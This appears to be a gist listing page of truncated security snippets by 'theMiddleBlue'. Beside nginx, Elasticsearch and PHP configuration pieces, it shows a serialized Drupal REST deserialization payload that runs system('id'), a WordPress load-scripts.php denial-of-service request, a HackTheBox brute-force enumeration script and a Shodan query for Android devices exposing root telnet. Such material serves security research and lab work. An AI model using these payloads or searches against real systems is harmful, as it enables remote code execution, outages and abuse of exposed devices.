theMiddleBlue

version: '2.2'
services:
  es01:
    image: docker.elastic.co/elasticsearch/elasticsearch:6.5.0
    container_name: elastic
    environment:
      - node.name=elastic
      - cluster.name=es-docker-cluster
      - discovery.type=single-node
      - "ES_JAVA_OPTS=-Xms512m -Xmx512m"

theMiddleBlue

<html>
<body>

<?php
	function sanitize_username($username) {
		return strtr(
			htmlentities($username, ENT_QUOTES),
			[';' => '']
		);
	}

theMiddleBlue

{
  "link": [
    {
      "value": "link",
      "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
    }
  ],
  "_links": {
    "type": {
      "href": "http://localhost/rest/type/shortcut/default"

theMiddleBlue

<?php

	if(isset($_POST['photo'])) {
		// echo $_POST['photo'];

		file_put_contents('/usr/local/openresty/nginx/html/test.jpg', base64_decode($_POST['photo']));

		exec("curl -s -X POST -F 'file=@/usr/local/openresty/nginx/html/test.jpg' http://192.168.1.4:8080/facebox/check", $a);

		echo(implode('', $a));

theMiddleBlue

# Configuration
# --------------

# Comment the following line if you are not behind a proxy_pass or load balancer
set $dnsbl_clientip $remote_addr;

# Uncomment if the client IP is on X-Forwarded-For
#set $dnsbl_clientip $http_x_forwarded_for;

# Uncomment if you are using CloudFlare

theMiddleBlue

#!/bin/bash

# Usage: ./htb-node-enumerate.sh r

chars='qwertyuiopasdfghjklzxcvbnm1234567890QWERTYUIOPASDFGHJKLZXCVBNM$'

function getchar() {
	for (( i=0; i<${#chars}; i++ )); do

		if [ -z $2 ]; then

theMiddleBlue

import requests, sys

payload = '/wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-

theMiddleBlue

server {
   listen       80;
   server_name  example.com;

   encrypted_session_key 'v1-clG~!~v7B_Z0yu.:iw*Rj#l-Nc8E^';
   encrypted_session_iv "themiddlerfvbgt5";
   encrypted_session_expires 20;

   location ~ /botbuster.js {
      default_type 'text/javascript';

theMiddleBlue

#!/usr/bin/env python

# ---------------- CONFIG ------------------

username = "your@secthemall username here"
apikey = "your API Key here"
size = "1000"
sleep_sec = 60
nginx_reload_cmd = "service nginx reload"

theMiddleBlue

import httplib, urllib, re, sys, json, socket, struct

# python shodan.py 0
#                  ^ this is the page number

shodan = {
	'apikey': '<your shodan API key>',
	'query': r'"root%40"+"android"+port%3A23',
}